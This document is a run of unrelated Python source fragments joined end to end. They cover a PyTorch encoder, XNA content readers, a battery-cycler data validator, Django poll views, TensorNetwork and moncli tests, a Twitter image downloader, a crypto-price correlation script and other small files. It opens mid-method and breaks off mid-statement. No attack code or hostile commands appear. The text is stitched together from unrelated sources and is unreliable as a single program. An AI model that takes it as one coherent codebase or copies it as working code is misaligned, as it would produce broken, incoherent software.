""" embedded = self.embedding(data) embedded = self.dropout(embedded) padding_mask: Optional[Tensor] if self.padding_idx is not None: padding_mask = (data != self.padding_idx).byte() encoding = self.encoder(embedded, padding_mask=padding_mask) else: padding_mask = None encoding = self.encoder(embedded) if self.pooling is not None: # Ignore states from encoders such as RNN or TransformerSRU encoding = encoding[0] if isinstance(encoding, tuple) else encoding encoding = self.pooling(encoding, padding_mask) return encoding
#!/usr/bin/env python3 #coding=utf8 from . import * from collections import namedtuple as _nt Texture2d = _nt('Texture2d', 'format width height miplevels') def texture2d(factory): fmt = u32(factory) w = u32(factory) h = u32(factory) n = u32(factory) mips = n * [None] for i in range(n): dsize = u32(factory) mips[i] = factory.stream.read_bytes(dsize) return Texture2d(fmt, w, h, mips) add_reader(texture2d, 'Microsoft.Xna.Framework.Content.Texture2DReader', 'Microsoft.Xna.Framework.Graphics.Texture2D') Effect = _nt('Effect', 'bytecode') def effect(factory): return Effect(genericlist(byte, factory)) add_reader(effect, 'Microsoft.Xna.Framework.Content.EffectReader', 'Microsoft.Xna.Framework.Graphics.Effect') SpriteFont = _nt('SpriteFont', 'texture glyphs crop charmap vspace hspace kerning defchar') def spritefont(factory): return SpriteFont(factory.read(), factory.read(), factory.read(), factory.read(), i32(factory), single(factory), factory.read(), nullable(char, factory)) add_reader(spritefont, 'Microsoft.Xna.Framework.Content.SpriteFontReader', 'Microsoft.Xna.Framework.Graphics.SpriteFont')
# Copyright [2020] [Toyota Research Institute] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Classes for advanced or specialized validation procedures on cycler data. Validation classes are designed to work with datapaths, meaning column names of input dataframes are standardized according to the validation schema. """ import os import numpy as np from monty.serialization import loadfn from beep import VALIDATION_SCHEMA_DIR DEFAULT_ARBIN_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-arbin-lfp.yaml") DEFAULT_EIS_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-maccor-eis.yaml") PROJECT_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-projects.yaml") class SimpleValidator: """ Lightweight class that does Dataframe-based, as opposed to dictionary based validation Note that schemas here are made to be identical to cerberus schemas and should support similar syntax, e. g. {COLUMN_NAME: {schema: type: TYPE_IN_COLUMN, [int, float, str, object] max: MAX_VALUE_IN_COLUMN, min: MIN_VALUE_IN_COLUMN type: list } } Note that the COLUMN_NAME.type key above is ignored, but COLUMN_NAME.schema.type is used. The only schema keys that are supported at this time are max, min, and type. Typing is compared using the key-mapping by rule defined by the ALLOWED_TYPES_BY_RULE attribute defined below. Supported type rules include "integer", "float", "numeric", and "string". Note that type-checking for this class is not equivalent to checking types, and may involve custom logic which is defined in the check_type method below. """ def __init__(self, schema_filename=DEFAULT_ARBIN_SCHEMA): """ Args: schema (dict): Schema to validate against. """ self.schema = loadfn(schema_filename) self.validation_records = None @staticmethod def check_type(df, type_rule): """ Method to check type of input dataframe. Args: df (pandas.Dataframe): DataFrame. 
type_rule (str): string corresponding to type_rule to check, supported type rules are: integer: checks for numeric values which are equal to their rounded values Returns: bool: valid str: verbose description of reason """ if type_rule not in ["integer", "float", "numeric", "string"]: raise ValueError( "type_rule {} not supported, please choose one " "of integer, float, numeric, or string" ) # Integer: Check residual from rounding if type_rule == "integer": nonint_indices = np.arange(len(df))[(df != np.round(df))] if nonint_indices.size > 0: value = df.iloc[nonint_indices[0]] return ( False, "integer type check failed at index {} with value {}".format( nonint_indices[0], value ), ) # Float: just check numpy dtyping elif type_rule == "float": if not np.issubdtype(df.dtype, np.floating): return False, "float type check failed, type is {}".format(df.dtype) # Numeric: check numpy number dtyping elif type_rule == "numeric": if not np.issubdtype(df.dtype, np.number): return False, "number type check failed, type is {}".format(df.dtype) # String: check string/unicode subdtype elif type_rule == "string": if not ( np.issubdtype(df.dtype, np.object_) or np.issubdtype(df.dtype, np.unicode_) ): return False, "string type check failed, type is {}".format(df.dtype) return True, "" def validate(self, dataframe): """ Method to run the validation on everything, and report the results, i. e. which columns are inconsistent with the schema. Args: dataframe (pandas.DataFrame): dataframe to be validated. Returns: dict: report corresponding to each validation str: reason for report validation failure, empty string on report validation success """ dataframe = dataframe.rename(str.lower, axis="columns") for column_name, value in self.schema.items(): column_schema = value["schema"] max_at_least_rule = column_schema.get("max_at_least") min_is_below_rule = column_schema.get("min_is_below") max_rule = column_schema.get("max") min_rule = column_schema.get("min") type_rule = column_schema.get("type") monotonic_rule = column_schema.get("monotonic") # Check type if type_rule is not None: validity, reason = self.check_type( dataframe[column_name], type_rule=type_rule ) if not validity: reason = "Column {}: {}".format(column_name, reason) return validity, reason # Check max if max_rule is not None: comp = np.where(dataframe[column_name] > max_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} is higher than allowed max {} at index {}: " "value={}".format(column_name, max_rule, index, value) ) return False, reason # Check min if min_rule is not None: comp = np.where(dataframe[column_name] < min_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} is lower than allowed min {} at index {}:" "value={}".format(column_name, min_rule, index, value) ) return False, reason # Check a maximum value is at least above a threshold if max_at_least_rule is not None: comp = np.where(dataframe[column_name].max() < max_at_least_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} needs to reach at least {} for processing, instead found:" "value={}".format(column_name, max_at_least_rule, value) ) return False, reason # Check a minimum value is below above a threshold if min_is_below_rule is not None: comp = np.where(dataframe[column_name].min() > min_is_below_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} needs to reach under {} for 
processing, instead found:"
                        "value={}".format(column_name, min_is_below_rule, value)
                    )
                    return False, reason

            if monotonic_rule == 'increasing':
                diff_series = dataframe[column_name].diff().dropna()
                if len(diff_series[diff_series < 0]) > 0:
                    reason = (
                        "{} needs to be monotonically increasing for processing".format(column_name)
                    )
                    return False, reason

        return True, ""


class BEEPValidationError(Exception):
    """Custom error to raise when validation fails"""
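# --- Usage sketch (illustrative addition, not part of the original module) ---
# A hedged example of running SimpleValidator on a small in-memory frame. The
# constructor normally loads one of the YAML schemas shipped in
# VALIDATION_SCHEMA_DIR; the toy schema and column names below are assumptions
# made only for this demonstration and are assigned directly over it.
if __name__ == "__main__":
    import pandas as pd

    validator = SimpleValidator()  # loads the default Arbin schema from disk
    validator.schema = {
        "cycle_index": {"schema": {"type": "integer", "min": 0}},
        "voltage": {"schema": {"type": "float", "max": 5.0}},
    }
    frame = pd.DataFrame({"cycle_index": [0, 1, 2], "voltage": [3.2, 3.6, 4.1]})
    is_valid, reason = validator.validate(frame)
    print(is_valid, reason)  # expected: True with an empty reason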
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from .ipython_api import IPythonAPI class Help_html(object): """ """ showfiles_base_url = None _pending_helps = {} @staticmethod def flush(window_location:str, options:dict={}): if (window_location.startswith("http://localhost") or window_location.startswith("https://localhost") or window_location.startswith("http://127.0.0.") or window_location.startswith("https://127.0.0.")): start = window_location[8:].find("/") + 9 parts = window_location[start:].split("/") parts.pop() Help_html.showfiles_base_url = window_location[:start] + "/".join(parts) else: notebook_service_address = options.get("notebook_service_address") if notebook_service_address is not None: host = notebook_service_address or "" start = host.find("//") + 2 suffix = "." + host[start:] else: suffix = ".notebooks.azure.com" end = window_location.find(suffix) start = window_location.find("//") # azure notebook environment, assume template: https://library-user.libray.notebooks.azure.com if start > 0 and end > 0 and ('-' in window_location): library, user = window_location[start + 2 : end].split("-", 1) host = notebook_service_address or "https://notebooks.azure.com" Help_html.showfiles_base_url = f"{host}/api/user/{user}/library/{library}/html" # assume just a remote kernel, as local else: parts = window_location.split("/") parts.pop() Help_html.showfiles_base_url = "/".join(parts) refresh = False for text, url in Help_html._pending_helps.items(): Help_html.add_menu_item(text, url, False, **options) refresh = True Help_html._pending_helps = {} if refresh: IPythonAPI.try_kernel_reconnect(**options) @staticmethod def add_menu_item(text, file_path: str, reconnect=True, **options): if not text: return if not file_path: return # add help link if file_path.startswith("http"): url = file_path elif Help_html.showfiles_base_url is not None: url = f"{Help_html.showfiles_base_url}/{file_path}" else: url = None if url: IPythonAPI.try_add_to_help_links(text, url, reconnect, **options) elif Help_html._pending_helps.get(text) is None: Help_html._pending_helps[text] = file_path
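# --- Usage sketch (illustrative addition, not part of the original module) ---
# A hedged illustration of how flush() derives showfiles_base_url from the
# browser window location when the kernel is served from localhost; the URL
# below is an arbitrary example, not one produced by this package.
if __name__ == "__main__":
    Help_html.flush("http://localhost:8888/notebooks/work/demo.ipynb")
    print(Help_html.showfiles_base_url)  # -> http://localhost:8888/notebooks/work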
'''
Created on 2017-01-08

@author: Think

[Program 15]
Problem: use nested conditional (ternary) operators to assign grades: scores of 90 and
above get an 'A', scores from 60 to 89 get a 'B', and scores below 60 get a 'C'.
1. Analysis: (a > b) ? a : b is the basic form of the conditional operator in C.
2. Source code: Python does not support that operator, so chained if/elif/else is used.
'''


def jcp015():
    # The builtin input() replaces the original import of raw_input from
    # pip._vendor.distlib.compat, which was only a Python 2/3 compatibility shim.
    score = int(input('input score:\n'))
    if score >= 90:
        grade = 'A'
    elif score >= 60:
        grade = 'B'
    else:
        grade = 'C'
    print('%d belongs to %s' % (score, grade))


jcp015()
import tweepy
import requests

from credentials import *


def create_api():
    """Creates api object from tweepy using api auth credentials."""
    auth = tweepy.OAuthHandler(api_key, secret_key)
    auth.set_access_token(access_token, access_token_secret)
    return tweepy.API(auth)


def retrieve_tweet(api_object):
    """Used to get a tweet object from authorized api object.

    Inputs
    ------
    Tweepy api object

    Returns
    -------
    Tweepy tweet object in extended mode.
    """
    tweet_url = input("Enter the URL of the tweet you would like analyzed.\n")
    tweet_id = tweet_url.split("/status/")[1]
    return api_object.get_status(tweet_id, tweet_mode="extended")


def save_images(tweet_object):
    """Used to save any images from desired tweet.

    Inputs
    ------
    Tweepy tweet object

    Returns
    -------
    Set of image URLs; the images themselves are saved in the project folder.
    """
    try:
        tweet_images = tweet_object.entities["media"]
    except KeyError:
        print("No picture found.")
        return None

    image_urls = set()
    for index, image in enumerate(tweet_images):
        image_urls.add(image["media_url"])
        try:
            res = requests.get(image["media_url"])
            res.raise_for_status()
        except requests.RequestException:
            print("Could not download {}.".format(image["media_url"]))
            continue
        # Save each downloaded image next to the script.
        with open("image{}.jpg".format(index + 1), "wb") as image_file:
            image_file.write(res.content)
    return image_urls


if __name__ == "__main__":
    api = create_api()
    tweet = retrieve_tweet(api)
    print(tweet.full_text)
    save_images(tweet)
from ..distance_metrics import levenshtein_distance, hamming_distance from ..exceptions import DistanceMetricError class PhoneticAlgorithm: """ The main Phonetic Algorithm class, to ensure a unified API for all the included algorithms. """ def __init__(self): self.distances = { 'levenshtein': levenshtein_distance, 'hamming': hamming_distance, } def phonetics(self, word): """Get the phonetic representation of the word.""" pass def sounds_like(self, word1, word2): """Compare the phonetic representations of 2 words, and return a boolean value.""" return self.phonetics(word1) == self.phonetics(word2) def distance(self, word1, word2, metric='levenshtein'): """Get the similarity of the words, using the supported distance metrics.""" if metric in self.distances: distance_func = self.distances[metric] return distance_func(self.phonetics(word1), self.phonetics(word2)) else: raise DistanceMetricError('Distance metric not supported! Choose from levenshtein, hamming.')
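# --- Usage sketch (illustrative addition, not part of the original module) ---
# A hedged example of the intended subclassing pattern: concrete algorithms
# override phonetics() and inherit sounds_like() and distance(). The toy
# vowel-stripping "algorithm" below is a stand-in, not one of the algorithms
# shipped with this package.
if __name__ == "__main__":
    class ToyAlgorithm(PhoneticAlgorithm):
        def phonetics(self, word):
            return ''.join(c for c in word.lower() if c not in 'aeiou')

    toy = ToyAlgorithm()
    print(toy.sounds_like('color', 'colour'))              # True: both reduce to 'clr'
    print(toy.distance('color', 'column', 'levenshtein'))  # distance between 'clr' and 'clmn'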
# -*- coding: utf-8 -*- # Author: jS1ngle # License: MIT License (http://opensource.org/licenses/MIT) import pandas as pd import requests import matplotlib.pyplot as plt from pytrends.request import TrendReq import datetime from datetime import timedelta from scipy.stats.stats import pearsonr from SimulationHelperFunctions import get_hist_price_data # ===Input data timeWindow = 100 timeWindowMovingAvg = 5 coinTo = "BTC" ccFrom = "EUR" exchange = "Kraken" keywords = ["bitcoin"] # ===Get raw data df = get_hist_price_data(coinTo, ccFrom, timeWindow, exchange) df.columns = [['close', 'high', 'low', 'open', 'time', 'volumefrom', 'volumeto', 'date']] # ===Starting point to have the exact amount of data sp = len(df.time[timeWindowMovingAvg-1:]) # ===Pass data to pytrend and execute it beginDateWindow = datetime.datetime.now().date() - timedelta(days=timeWindow) pytrend = TrendReq() dataWindow = str(beginDateWindow) + " " + str(datetime.datetime.now().date()) pytrend.build_payload(keywords, cat=0, timeframe=dataWindow) dfTrend = pytrend.interest_over_time() # using interest over time function dfTrend.columns = ['keyword', 't'] # === Moving average maTrendPrice = df.close.rolling(center=False, window=timeWindowMovingAvg).mean() maTrendVolume = df.volumeto.rolling(center=False, window=timeWindowMovingAvg).mean() maTrendGoogle = dfTrend.keyword.rolling(center=False, window=timeWindowMovingAvg).mean() # === Flatten lists trend = dfTrend.keyword.tolist() close = [y for x in df['close'].values.tolist() for y in x] volume = [y for x in df['volumeto'].values.tolist() for y in x] date = [y for x in df['date'].values.tolist() for y in x] # === Drop last 3 entries since google is 3 days delayed close = close[:-3] volume = volume[:-3] date = date[:-3] # === Calc Pearson correlation coefficients priceCorrelationCoefficient = pearsonr(trend, close)[0] volumeCorrelationCoefficient = pearsonr(trend, volume)[0] print(priceCorrelationCoefficient) print(volumeCorrelationCoefficient) # ===Plot data price and trend fig, ax1 = plt.subplots() ax1.plot(date, close, 'r', label='Price', linewidth=1.5) ax1.set_ylabel('Price in Euro', color='r') ax2 = ax1.twinx() ax2.plot(trend, 'b', label='Google trend', linewidth=1.5) ax2.set_ylabel('Google trend', color='b') for label in ax1.xaxis.get_ticklabels(): label.set_rotation(45) ax1.xaxis.set_major_locator(plt.MaxNLocator(10)) fig.tight_layout() fig.savefig('correlating_price_trend.png') # ===Plot volume and trend fig2, ax3 = plt.subplots() ax3.plot(date, volume, 'g', label='Volume', linewidth=1.5) ax3.set_ylabel('Volume', color='g') ax4 = ax3.twinx() ax4.plot(trend, 'b', label='Google trend', linewidth=1.5) ax4.set_ylabel('Google trend', color='b') for label in ax3.xaxis.get_ticklabels(): label.set_rotation(45) ax3.xaxis.set_major_locator(plt.MaxNLocator(10)) fig2.tight_layout() plt.show() fig2.savefig('correlating_volume_trend.png')
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.template import loader
from django.urls import reverse

from .models import Question


def index(request):
    ultima_questao_lista = Question.objects.order_by('data_publicacao')[:5]
    template = loader.get_template('polls/index.html')
    context = {
        'ultima_quest_lista': ultima_questao_lista,
    }
    return HttpResponse(template.render(context, request))


def detail(request, question_id):
    return HttpResponse('Visualizando a votação de: %s' % question_id)


def results(request, question_id):
    resultado = 'Você está olhando o resultado da votação de: %s'
    return HttpResponse(resultado % question_id)


def vote(request, question_id):
    question = get_object_or_404(Question, pk=question_id)
    try:
        escolhida = question.txt_pergunta.get(pk=request.POST['escolha'])
    except (KeyError, ObjectDoesNotExist):
        # Redisplay the voting form with an error message.
        return render(request, 'polls/detail.html', {
            'question': question,
            'error_message': 'Você não selecionou todas as partidas!'
        })
    else:
        # The original `escolhida += 1` rebound the name to an int and broke the
        # following .save(); the counter field name `votos` is an assumption and
        # should match the actual field on the related model.
        escolhida.votos += 1
        escolhida.save()
        # Always return an HttpResponseRedirect after successfully handling POST
        # data. This prevents the data from being submitted twice if the user
        # presses the Back button.
        return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
# Copyright 2019 The TensorNetwork Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import tensornetwork as tn import pytest import numpy as np from tensornetwork.block_sparse import (U1Charge, BlockSparseTensor, Index, BaseCharge) from tensornetwork.block_sparse.charge import charge_equal from tensornetwork.block_sparse.utils import _find_diagonal_sparse_blocks def get_random(shape, num_charges, dtype=np.float64): R = len(shape) charges = [ BaseCharge( np.random.randint(-5, 5, (shape[n], num_charges)), charge_types=[U1Charge] * num_charges) for n in range(R) ] flows = list(np.full(R, fill_value=False, dtype=np.bool)) indices = [Index(charges[n], flows[n]) for n in range(R)] return BlockSparseTensor.random(indices=indices, dtype=dtype) def get_square_matrix(shape, num_charges, dtype=np.float64): charge = BaseCharge( np.random.randint(-5, 5, (shape, num_charges)), charge_types=[U1Charge] * num_charges) flows = [True, False] indices = [Index(charge, flows[n]) for n in range(2)] return BlockSparseTensor.random(indices=indices, dtype=dtype) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_full_svd_names(num_charges): np.random.seed(10) a = tn.Node( get_random((10, 10), num_charges=num_charges), backend='symmetric') e1 = a[0] e2 = a[1] left, s, right, _, = tn.split_node_full_svd( a, [e1], [e2], left_name='left', middle_name='center', right_name='right', left_edge_name='left_edge', right_edge_name='right_edge') assert left.name == 'left' assert s.name == 'center' assert right.name == 'right' assert left.edges[-1].name == 'left_edge' assert s[0].name == 'left_edge' assert s[1].name == 'right_edge' assert right.edges[0].name == 'right_edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_rq_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_rq( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_qr_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_qr( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("num_charges", [1, 2]) def test_split_node_names(num_charges): np.random.seed(10) a = tn.Node( get_random((5, 5, 5, 5, 5), num_charges=num_charges), backend='symmetric') left_edges = [] for i in range(3): 
left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right, _ = tn.split_node( a, left_edges, right_edges, left_name='left', right_name='right', edge_name='edge') assert left.name == 'left' assert right.name == 'right' assert left.edges[-1].name == 'edge' assert right.edges[0].name == 'edge' @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_rq_unitarity(dtype, num_charges): np.random.seed(10) a = tn.Node( get_square_matrix(50, num_charges, dtype=dtype), backend='symmetric') r, q = tn.split_node_rq(a, [a[0]], [a[1]]) r[1] | q[0] qbar = tn.conj(q) q[1] ^ qbar[1] u1 = q @ qbar qbar[0] ^ q[0] u2 = qbar @ q blocks, _, shapes = _find_diagonal_sparse_blocks(u1.tensor.flat_charges, u1.tensor.flat_flows, len(u1.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u1.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) blocks, _, shapes = _find_diagonal_sparse_blocks(u2.tensor.flat_charges, u2.tensor.flat_flows, len(u2.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u2.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_rq(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges, dtype=dtype), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_rq(a, left_edges, right_edges) tn.check_correct([left, right]) result = tn.contract(left[3]) np.testing.assert_allclose(result.tensor.data, a.tensor.data) assert np.all([ charge_equal(result.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_qr_unitarity(dtype, num_charges): np.random.seed(10) a = tn.Node( get_square_matrix(50, num_charges, dtype=dtype), backend='symmetric') q, r = tn.split_node_qr(a, [a[0]], [a[1]]) r[0] | q[1] qbar = tn.conj(q) q[1] ^ qbar[1] u1 = q @ qbar qbar[0] ^ q[0] u2 = qbar @ q blocks, _, shapes = _find_diagonal_sparse_blocks(u1.tensor.flat_charges, u1.tensor.flat_flows, len(u1.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u1.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) blocks, _, shapes = _find_diagonal_sparse_blocks(u2.tensor.flat_charges, u2.tensor.flat_flows, len(u2.tensor._order[0])) for n, block in enumerate(blocks): np.testing.assert_almost_equal( np.reshape(u2.tensor.data[block], shapes[:, n]), np.eye(N=shapes[0, n], M=shapes[1, n])) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_split_node_qr(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') left_edges = [] for i in range(3): left_edges.append(a[i]) right_edges = [] for i in range(3, 5): right_edges.append(a[i]) left, right = tn.split_node_qr(a, left_edges, right_edges) tn.check_correct([left, right]) result = tn.contract(left[3]) np.testing.assert_allclose(result.tensor.data, a.tensor.data) assert np.all([ 
charge_equal(result.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_conj(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') abar = tn.conj(a) np.testing.assert_allclose(abar.tensor.data, a.backend.conj(a.tensor.data)) assert np.all([ charge_equal(abar.tensor._charges[n], a.tensor._charges[n]) for n in range(len(a.tensor._charges)) ]) @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_transpose(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((6, 7, 8, 9, 10), num_charges=num_charges, dtype=dtype), backend='symmetric') order = [a[n] for n in reversed(range(5))] transpa = tn.transpose(a, [4, 3, 2, 1, 0]) a.reorder_edges(order) np.testing.assert_allclose(a.tensor.data, transpa.tensor.data) def test_switch_backend(): np.random.seed(10) a = tn.Node(np.random.rand(3, 3, 3), name="A", backend="numpy") b = tn.Node(np.random.rand(3, 3, 3), name="B", backend="numpy") c = tn.Node(np.random.rand(3, 3, 3), name="C", backend="numpy") nodes = [a, b, c] with pytest.raises(ValueError): tn.switch_backend(nodes, 'symmetric') @pytest.mark.parametrize("dtype", [np.float64, np.complex128]) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_contract_trace_edges(dtype, num_charges): np.random.seed(10) a = tn.Node( get_random((3, 3, 3), num_charges=num_charges, dtype=dtype), backend='symmetric') with pytest.raises(ValueError): tn.contract_trace_edges(a) @pytest.mark.parametrize("num_charges", [1, 2, 3]) def test_switch_backend_raises_error(num_charges): np.random.seed(10) a = tn.Node( get_random((3, 3, 3), num_charges=num_charges, dtype=np.float64), backend='symmetric') with pytest.raises(NotImplementedError): tn.switch_backend({a}, 'numpy') def test_switch_backend_raises_error_2(): np.random.seed(10) a = tn.Node(np.random.rand(3, 3, 3)) with pytest.raises(ValueError): tn.switch_backend({a}, 'symmetric')
#! /usr/bin/env python
import json
import sys

import ddlib  # Load the ddlib Python library for NLP functions

# For each input row
for line in sys.stdin:
    # Load the JSON object
    row = json.loads(line)
    # Output data (parenthesized print works under both Python 2 and Python 3)
    print(json.dumps(row))
import numpy as np red = np.array((1., 0, 0, 1.),'f4') orange = np.array((1., 0.498, 0, 1),'f4') yellow = np.array((1, 1, 0, 1.),'f4') green = np.array((0, 1, 0, 1.),'f4') cyan = np.array((0, 1., 1., 1.),'f4') blue = np.array((0, 0, 1., 1.),'f4') purple = np.array((1., 0, 1., 1.),'f4') white = np.array((1.,1,1,1),'f4') grey = np.array((0.498, 0.498, 0.498, 1.),'f4') black = np.array((0, 0, 0, 1.),'f4')
from unittest.mock import patch from nose.tools import ok_, eq_, raises from moncli import MondayClient, entities as en from moncli.enums import BoardKind USERNAME = 'test.user@foobar.org' GET_ME_RETURN_VALUE = en.User(**{'creds': None, 'id': '1', 'email': USERNAME}) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.duplicate_group') def test_should_duplicate_a_group(duplicate_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} duplicate_group.return_value = {'id': 'group_01', 'title': 'Group 1 (copy)'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.duplicate() # Assert ok_(group != None) eq_(group.title, 'Group 1 (copy)') @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.archive_group') def test_should_archive_a_group(archive_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} archive_group.return_value = {'id': 'group_01', 'title': 'Group 1', 'archived': 'true'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.archive() # Assert ok_(group != None) eq_(group.title, 'Group 1') eq_(group.archived, True) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.delete_group') def test_should_delete_a_group(delete_group, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} delete_group.return_value = {'id': 'group_01', 'title': 'Group 1', 'deleted': 'true'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act group = group.delete() # Assert ok_(group != None) eq_(group.title, 'Group 1') eq_(group.deleted, True) @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.create_item') def test_should_create_an_item(create_item, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} create_item.return_value = {'id': '1', 'name': 'Item 1'} client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act item = group.add_item('Item 1') # Assert ok_(item != None) eq_(item.name, 'Item 1') @patch.object(MondayClient, 'get_me') @patch('moncli.api_v2.create_board') @patch('moncli.api_v2.create_group') @patch('moncli.api_v2.get_boards') @patch('moncli.api_v2.get_items') def test_should_retrieve_a_list_of_items(get_items, get_boards, create_group, create_board, get_me): # Arrange get_me.return_value = GET_ME_RETURN_VALUE 
create_board.return_value = {'id': '1', 'name': 'Test Board 1'} create_group.return_value = {'id': 'group_01', 'title': 'Group 1'} get_boards.return_value = [ {'id': '1', 'groups': [ {'id': 'group_01', 'items':[ {'id': '1', 'name': 'Item 1'}]}]}] client = MondayClient(USERNAME, '', '') board = client.create_board('Test Board 1', BoardKind.public) group = board.add_group('Group 1') # Act items = group.get_items() # Assert ok_(items != None) eq_(len(items), 1) eq_(items[0].name, 'Item 1')
import sys

import antlr3
import antlr3.tree
from LangLexer import LangLexer
from LangParser import LangParser
from LangDumpDecl import LangDumpDecl

cStream = antlr3.FileStream(sys.argv[1])
lexer = LangLexer(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = LangParser(tStream)
r = parser.start()
# Parenthesized print works under both Python 2 and Python 3
print("tree: " + r.tree.toStringTree())

nodes = antlr3.tree.CommonTreeNodeStream(r.tree)
nodes.setTokenStream(tStream)
walker = LangDumpDecl(nodes)
walker.decl()
import subprocess

# Prefer omxplayer when it is available (e.g. on a Raspberry Pi), otherwise fall back to VLC.
player = "vlc"
returncode = subprocess.call(["which", "omxplayer"])
if returncode == 0:
